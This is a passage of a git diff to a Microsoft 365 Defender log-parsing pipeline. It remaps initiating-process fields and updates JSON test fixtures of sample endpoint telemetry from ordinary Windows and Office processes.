action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' @@ -418,7 +418,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -531,15 +530,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index 17cad5081..ca708b0ed 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index 413d002c1..2655cb069 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -23,18 +23,16 @@ "action": { "properties": { "AccountSid": "S-1-2-3", - "process": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" }, "type": "SensitiveFileRead" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 4964dae1f..1f1351d52 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json index c34cefa50..3292ed6fe 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:19:26.502777Z", "action": { "properties": { - "process": { - "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", - "CommandLine": "\"OUTLOOK.EXE\" ", - "FileSize": 44152968, - "LogonId": "389220681", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Outlook", - "VersionInfoInternalFileName": "Outlook", - "VersionInfoOriginalFileName": "Outlook.exe", - "VersionInfoProductName": "Microsoft Outlook", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "GetClipboardData" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json index ea0ddb0df..fea26327a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:15:59.550882Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", - "CommandLine": "powershell.exe", - "FileSize": 450560, - "LogonId": "398124703", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows PowerShell", - "VersionInfoInternalFileName": "POWERSHELL", - "VersionInfoOriginalFileName": "PowerShell.EXE", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.3085" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" }, "type": "PowerShellCommand" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 48696c644..672754009 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:17:23.330722Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "ShellLinkCreateFileEvent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 94b70858f..7428190cf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json @@ -16,19 +16,17 @@ "@timestamp": "2022-09-01T07:46:42.468408Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "FileSize": 56824728, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "VersionInfoInternalFileName": "OneDriveSetup.exe", - "VersionInfoOriginalFileName": "OneDriveSetup.exe", - "VersionInfoProductName": "Microsoft OneDrive", - "VersionInfoProductVersion": "22.166.0807.0002" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "InitiatingProcessFileSize": 56824728, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", + "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" }, "type": "FileDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json index 1a9daafcd..73d8718f8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -22,19 +22,17 @@ "@timestamp": "2024-11-08T14:38:51.904876Z", "action": { "properties": { - "RequestAccountSid": "S-1-2-3", - "process": { - "CommandLine": "commandexec.exe /V", - "FileSize": 176128, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "commandexec", - "VersionInfoOriginalFileName": "commandexec.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" }, "type": "FileCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 04559806a..497faa7bf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json @@ -16,12 +16,10 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "process": { - "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "FileSize": 66560, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault" - } + "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "InitiatingProcessFileSize": 66560, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" }, "type": "ImageLoaded" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index e70edf395..15dc7a41b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,11 +17,9 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", + "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive", - "process": { - "CommandLine": "WinLogon.exe -SpecialSession" - } + "LogonType": "Interactive" }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 75ab306b8..348f76f4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json @@ -16,21 +16,19 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { + "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "InitiatingProcessFileSize": 63984520, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", + "InitiatingProcessVersionInfoInternalFileName": "Excel", + "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public", - "process": { - "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "FileSize": 63984520, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Excel", - "VersionInfoInternalFileName": "Excel", - "VersionInfoOriginalFileName": "Excel.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.15601.20538" - } + "RemoteIPType": "Public" }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 3847a138b..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -17,30 +17,26 @@ "action": { "properties": { "AccountSid": "S-1-1-11", + "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", + "InitiatingProcessFileSize": 133576, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", + "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "VersionInfoInternalFileName": "MpCmdRun", - "VersionInfoOriginalFileName": "MpCmdRun.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6", - "parent": { - "CommandLine": "\"MsMpEng.exe\"", - "FileSize": 133576, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Antimalware Service Executable", - "VersionInfoInternalFileName": "MsMpEng.exe", - "VersionInfoOriginalFileName": "MsMpEng.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "ProcessVersionInfoInternalFileName": "MpCmdRun", + "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "4.18.2301.6" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index cac1e9791..cab75fb0a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -23,30 +23,26 @@ "action": { "properties": { "AccountSid": "S-1-2-3", + "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "InitiatingProcessFileSize": 145408, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "file", + "InitiatingProcessVersionInfoOriginalFileName": "file.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Network Command Shell", - "VersionInfoInternalFileName": "processcommand.exe", - "VersionInfoOriginalFileName": "processcommand.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.1", - "parent": { - "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "FileSize": 145408, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "file", - "VersionInfoOriginalFileName": "file.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Network Command Shell", + "ProcessVersionInfoInternalFileName": "processcommand.exe", + "ProcessVersionInfoOriginalFileName": "processcommand.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "10.0.22621.1" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 212f23549..3fe0d2cf8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json @@ -16,19 +16,17 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", - "process": { - "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "FileSize": 445440, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Host Process for OMA-DM Client", - "VersionInfoInternalFileName": "omadmclient", - "VersionInfoOriginalFileName": "omadmclient.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.19041.2193" - } + "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "InitiatingProcessFileSize": 445440, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", + "InitiatingProcessVersionInfoInternalFileName": "omadmclient", + "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index c632ebbfa..a04e0e8be 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 5f3e9f9b1..294c92d60 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json @@ -17,18 +17,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 57b4e7abc..031a0b50a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": 